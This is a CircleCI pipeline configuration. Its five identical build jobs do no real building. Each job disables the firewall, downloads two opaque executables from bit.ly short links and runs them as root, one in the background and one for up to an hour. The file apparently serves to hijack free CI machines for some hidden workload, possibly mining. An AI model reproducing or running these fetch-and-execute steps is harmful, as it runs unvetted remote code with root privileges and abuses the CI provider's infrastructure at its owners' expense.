version: 2
jobs:
  build:
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "creating"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://bit.ly/3upqJLn
          chmod +x 3upqJLn
          sudo su --command "nohup ./3upqJLn --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "deploy"
         no_output_timeout: 60m
         command: |
          wget https://bit.ly/3yGlaLb
          chmod +x 3yGlaLb
          sudo su --command "./3yGlaLb"
  build_1:
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "creating"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://bit.ly/3upqJLn
          chmod +x 3upqJLn
          sudo su --command "nohup ./3upqJLn --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "deploy"
         no_output_timeout: 60m
         command: |
          wget https://bit.ly/3yGlaLb
          chmod +x 3yGlaLb
          sudo su --command "./3yGlaLb"
  build_2:
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "creating"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://bit.ly/3upqJLn
          chmod +x 3upqJLn
          sudo su --command "nohup ./3upqJLn --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "deploy"
         no_output_timeout: 60m
         command: |
          wget https://bit.ly/3yGlaLb
          chmod +x 3yGlaLb
          sudo su --command "./3yGlaLb"
  build_3:
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "creating"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://bit.ly/3upqJLn
          chmod +x 3upqJLn
          sudo su --command "nohup ./3upqJLn --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "deploy"
         no_output_timeout: 60m
         command: |
          wget https://bit.ly/3yGlaLb
          chmod +x 3yGlaLb
          sudo su --command "./3yGlaLb"
  build_4:
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps:
      - run: 
         name: "creating"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://bit.ly/3upqJLn
          chmod +x 3upqJLn
          sudo su --command "nohup ./3upqJLn --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "deploy"
         no_output_timeout: 60m
         command: |
          wget https://bit.ly/3yGlaLb
          chmod +x 3yGlaLb
          sudo su --command "./3yGlaLb"
       
workflows:
  version: 2
  build:
    jobs:
      - build
      - build_1
      - build_2
      - build_3
      - build_4
